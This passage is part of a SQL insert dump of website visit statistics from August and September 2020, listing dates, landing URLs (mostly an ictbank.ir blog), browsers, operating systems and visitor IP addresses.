(4439,'2020-08-25','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','154.8.136.117','000',0,2,0),
(4440,'2020-08-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.8.13','000',0,1,0),
(4441,'2020-08-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4442,'2020-08-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','112.78.117.29','000',0,1,0),
(4443,'2020-08-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(4444,'2020-08-25','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.210.141.146','000',0,1,0),
(4445,'2020-08-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','139.159.210.15','000',0,1,0),
(4446,'2020-08-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4447,'2020-08-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4448,'2020-08-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.242','000',0,1,0),
(4449,'2020-08-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.84.196','000',0,1,0),
(4450,'2020-08-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(4451,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.70.64','000',0,1,0),
(4452,'2020-08-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4453,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.132.167','000',0,1,0),
(4454,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','178.128.226.90','000',0,2,0),
(4455,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','138.197.147.71','000',0,1,0),
(4456,'2020-08-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(4457,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.37.245.85','000',0,1,0),
(4458,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.254.114','000',0,1,0),
(4459,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.59.140','000',0,1,0),
(4460,'2020-08-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(4461,'2020-08-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.212.148.151','000',0,1,0),
(4462,'2020-08-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.201.134.43','000',0,1,0),
(4463,'2020-08-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4464,'2020-08-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.221.168.189','000',0,1,0),
(4465,'2020-08-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4466,'2020-08-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4467,'2020-08-26','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','136.27.62.24','000',0,1,0),
(4468,'2020-08-26','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(4469,'2020-08-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','89.248.168.140','000',0,1,0),
(4470,'2020-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.228.46.113','000',0,2,0),
(4471,'2020-08-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.92.147','000',0,3,0),
(4472,'2020-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.5.153','000',0,1,0),
(4473,'2020-08-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,1,0),
(4474,'2020-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.118.237','000',0,1,0),
(4475,'2020-08-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(4476,'2020-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.194.21','000',0,1,0),
(4477,'2020-08-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.64.104.10','000',0,1,0),
(4478,'2020-08-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.121.163.206','000',0,3,0),
(4479,'2020-08-27','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.163','000',0,1,0),
(4480,'2020-08-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,1,0),
(4481,'2020-08-27','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','176.31.252.167','000',0,1,0),
(4482,'2020-08-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4483,'2020-08-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4484,'2020-08-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.183.187','000',0,1,0),
(4485,'2020-08-27','http://82.102.9.14/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','210.95.171.88','000',0,1,0),
(4486,'2020-08-27','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','122.51.95.85','000',0,3,0),
(4487,'2020-08-27','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','192.241.235.210','000',0,1,0),
(4488,'2020-08-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(4489,'2020-08-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4490,'2020-08-28','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','148.72.64.192','000',0,1,0),
(4491,'2020-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.220.120','000',0,1,0),
(4492,'2020-08-28','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','142.93.126.181','000',0,1,0),
(4493,'2020-08-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.128','000',0,1,0),
(4494,'2020-08-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(4495,'2020-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.158.169.206','000',0,1,0),
(4496,'2020-08-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(4497,'2020-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.239.133','000',0,1,0),
(4498,'2020-08-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(4499,'2020-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.111.218','000',0,1,0),
(4500,'2020-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.21.98.47','000',0,1,0),
(4501,'2020-08-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.243.196','000',0,1,0),
(4502,'2020-08-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.182.210.34','000',0,1,0),
(4503,'2020-08-28','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(4504,'2020-08-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4505,'2020-08-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4506,'2020-08-28','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','159.203.23.204','000',0,2,0),
(4507,'2020-08-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4508,'2020-08-28','http://ictbank.ir/blog','Silk','FireOS','4.5',NULL,NULL,'','195.146.37.2','000',0,30,0),
(4509,'2020-08-28','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.163','000',0,1,0),
(4510,'2020-08-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','195.146.37.2','000',0,15,0),
(4511,'2020-08-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.33.151','000',0,1,0),
(4512,'2020-08-29','http://design-arena.ir/blog','Safari','OS X','10.12.6',NULL,NULL,'','51.15.38.171','000',0,1,0),
(4513,'2020-08-29','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','172.245.58.62','000',0,7,0),
(4514,'2020-08-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.83.183','000',0,1,0),
(4515,'2020-08-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4516,'2020-08-29','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','203.129.113.142','000',0,1,0),
(4517,'2020-08-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.246.182','000',0,1,0),
(4518,'2020-08-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.208.124.141','000',0,1,0),
(4519,'2020-08-29','http://82.102.9.14:80/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','77.83.187.192','000',0,1,0),
(4520,'2020-08-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4521,'2020-08-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4522,'2020-08-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(4523,'2020-08-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','37.194.188.26','000',0,1,0),
(4524,'2020-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.220.32','000',0,1,0),
(4525,'2020-08-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4526,'2020-08-30','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4527,'2020-08-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(4528,'2020-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.53.78.136','000',0,1,0),
(4529,'2020-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.69.198','000',0,1,0),
(4530,'2020-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.91.149','000',0,1,0),
(4531,'2020-08-30','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(4532,'2020-08-30','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(4533,'2020-08-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.68.162','000',0,1,0),
(4534,'2020-08-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','94.242.26.158','000',0,1,0),
(4535,'2020-08-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4536,'2020-08-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4537,'2020-08-30','http://design-arena.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','51.159.23.217','000',0,1,0),
(4538,'2020-08-30','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','171.34.178.82','000',0,1,0),
(4539,'2020-08-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.84','000',0,2,0),
(4540,'2020-08-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.3','000',0,1,0),
(4541,'2020-08-30','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(4542,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.221.28','000',0,1,0),
(4543,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.16','000',0,2,0),
(4544,'2020-08-31','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4545,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.162.231.95','000',0,1,0),
(4546,'2020-08-31','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(4547,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.193.238','000',0,1,0),
(4548,'2020-08-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.12.163.251','000',0,5,0),
(4549,'2020-08-31','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4550,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.33.55','000',0,1,0),
(4551,'2020-08-31','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.102.9.34','000',0,1,0),
(4552,'2020-08-31','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.137.30.233','000',0,1,0),
(4553,'2020-08-31','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','62.234.140.204','000',0,3,0),
(4554,'2020-08-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4555,'2020-08-31','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4556,'2020-08-31','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.163','000',0,1,0),
(4557,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.83.144','000',0,1,0),
(4558,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.163.194.151','000',0,1,0),
(4559,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.90.105.174','000',0,1,0),
(4560,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.101','000',0,1,0),
(4561,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.29','000',0,1,0),
(4562,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.130','000',0,1,0),
(4563,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.212.213.93','000',0,1,0),
(4564,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.51','000',0,1,0),
(4565,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.241.205.1','000',0,1,0),
(4566,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,1,0),
(4567,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.161','000',0,1,0),
(4568,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.125.82','000',0,1,0),
(4569,'2020-08-31','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.57.226.29','000',0,1,0),
(4570,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.2.19','000',0,1,0),
(4571,'2020-09-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4572,'2020-09-01','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','64.137.88.162','000',0,1,0),
(4573,'2020-09-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','183.89.212.92','000',0,1,0),
(4574,'2020-09-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','189.59.5.81','000',0,1,0),
(4575,'2020-09-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','183.89.241.133','000',0,1,0),
(4576,'2020-09-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','177.244.0.6','000',0,1,0),
(4577,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.188.175','000',0,1,0),
(4578,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.185.4','000',0,1,0),
(4579,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','161.97.87.135','000',0,1,0),
(4580,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.172','000',0,1,0),
(4581,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.232.154','000',0,1,0),
(4582,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.63.13.53','000',0,1,0),
(4583,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.61','000',0,2,0),
(4584,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.232.142','000',0,1,0),
(4585,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.30','000',0,2,0),
(4586,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.80','000',0,1,0),
(4587,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.130','000',0,1,0),
(4588,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.126','000',0,1,0),
(4589,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.10.150.50','000',0,1,0),
(4590,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.30.45.74','000',0,1,0),
(4591,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.20','000',0,1,0),
(4592,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.131.62.248','000',0,1,0),
(4593,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.88.49.33','000',0,1,0),
(4594,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.13.221','000',0,1,0),
(4595,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.67','000',0,1,0),
(4596,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.74.138.9','000',0,1,0),
(4597,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.15','000',0,1,0),
(4598,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.133','000',0,1,0),
(4599,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.136','000',0,1,0),
(4600,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.46','000',0,1,0),
(4601,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.3','000',0,1,0),
(4602,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.154','000',0,1,0),
(4603,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','2.30.112.48','000',0,1,0),
(4604,'2020-09-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(4605,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.193.170','000',0,1,0),
(4606,'2020-09-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(4607,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.149.91','000',0,1,0),
(4608,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','150.129.236.86','000',0,1,0),
(4609,'2020-09-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4610,'2020-09-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4611,'2020-09-01','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(4612,'2020-09-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(4613,'2020-09-01','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(4614,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','118.69.172.7','000',0,1,0),
(4615,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.113.181.151','000',0,1,0),
(4616,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(4617,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.28','000',0,1,0),
(4618,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.97.100.15','000',0,1,0),
(4619,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','208.109.9.37','000',0,1,0),
(4620,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.244.52.99','000',0,1,0),
(4621,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.78','000',0,1,0),
(4622,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(4623,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','108.174.49.215','000',0,1,0),
(4624,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.176','000',0,1,0),
(4625,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.62.206.242','000',0,1,0),
(4626,'2020-09-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.58.1','000',0,1,0),
(4627,'2020-09-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4628,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.15.174.150','000',0,1,0),
(4629,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.164.185','000',0,1,0),
(4630,'2020-09-02','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','193.106.30.99','000',0,1,0),
(4631,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.232.136','000',0,1,0),
(4632,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,1,0),
(4633,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.42.172','000',0,1,0),
(4634,'2020-09-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4635,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.15.174.151','000',0,1,0),
(4636,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(4637,'2020-09-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.6','000',0,1,0),
(4638,'2020-09-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4639,'2020-09-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4640,'2020-09-02','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','51.255.128.206','000',0,1,0),
(4641,'2020-09-02','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4642,'2020-09-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4643,'2020-09-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','85.169.54.125','000',0,1,0),
(4644,'2020-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.66.193','000',0,1,0),
(4645,'2020-09-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(4646,'2020-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.175.5','000',0,1,0),
(4647,'2020-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.244.12','000',0,1,0),
(4648,'2020-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.140.28','000',0,1,0),
(4649,'2020-09-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.77.142.166','000',0,1,0),
(4650,'2020-09-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4651,'2020-09-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4652,'2020-09-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4653,'2020-09-03','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','3.101.0.4','000',0,1,0),
(4654,'2020-09-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4655,'2020-09-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(4656,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.196.48','000',0,1,0),
(4657,'2020-09-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4658,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(4659,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,1,0),
(4660,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.197.62','000',0,1,0),
(4661,'2020-09-04','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','104.152.185.185','000',0,1,0),
(4662,'2020-09-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.77.64.72','000',0,1,0),
(4663,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.151.186','000',0,1,0),
(4664,'2020-09-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','86.120.224.221','000',0,1,0),
(4665,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.235.93','000',0,1,0),
(4666,'2020-09-04','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(4667,'2020-09-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.114.95.70','000',0,1,0),
